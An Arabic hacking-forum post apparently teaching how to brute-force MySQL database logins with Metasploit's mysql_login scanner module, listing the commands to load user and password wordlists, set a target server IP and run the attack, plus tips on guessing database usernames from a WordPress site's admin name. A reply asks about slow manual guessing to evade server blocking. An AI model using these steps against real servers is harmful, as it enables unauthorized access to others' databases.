منتديات ترياق العرب

نسخة كاملة : التخمين على Mysql باستخدام الميتاسبلويت
أنت حالياً تتصفح نسخة خفيفة من المنتدى . مشاهدة نسخة كاملة مع جميع الأشكال الجمالية .
السلام عليكم ورحمة الله وبركاته
شرح التخمين على قواعد بيانات - Mysql
في هذا الشرح راح نستخدم مشروع الميتا سبلويت
ويفيدنى التخمين في الاستهداف
على سبيل المثال معنا موقع ويوزره : user
في الغالب بيكون اسم المستخدم لقاعدة البيانات هو : user_wp
السكربت هو وورد بريس كمثال ...
^
كمثال مو شرط يكون على طول كذا
طيب الحين نفتح الميتاسبلويت ونكتب الامر :
use auxiliary/scanner/mysql/mysql_login 
[صورة: p_2072yd8651.png]

نظهر الاعدادات :


show options 

[صورة: p_2072133d61.png]

الحين نضبط مسار لستة اليوزرات :


set USER_FILE /home/cyber/Desktop/user.txt


+

نضبط مسار لستة الباسووردات :


set PASS_FILE /home/cyber/Desktop/pass.txt

[صورة: p_2072y4k271.png]

نجي لتحديد ايبي السيرفر بالامر :


set RHOSTS ipserver


^

بدل كلمة : ipserver تضع ايبي السيرفر

والامر االاخير لتشغيل الاداة والتخمين على Mysql :

run


بالحاله هذي يبدا يخمن على قاعدة البيانات
وحسب لستة اليوزرات والباسووردات اللي تخمن فيها

واذا وقف وما خمن .. بالحاله هذي السيرفر مانع التخمين على mysql
قاعدة البيانات

وسلامتكم ... في آمان الله

https://www.twitter.com/Ht4ccess




احسنت اخي واصل ⁦❤️⁩?
كفو شرح وافي وكافي واصل يابطل

ونطمع بالمزيد يامبدع
يعطيك العافيه اخوي على الشرح

في حال كان السيرفر مانع التخمين على الخدمات mysql

هل ينفع تخمين يدوي بالميتاسبلويت بمعنى ادخال user و password

يعني كل بعد 5 دقائق ادخل اسم مستخدم وباسورد ؟
موضوع مهم واستفدت منه شكرا لك

استمر

تقبل مروري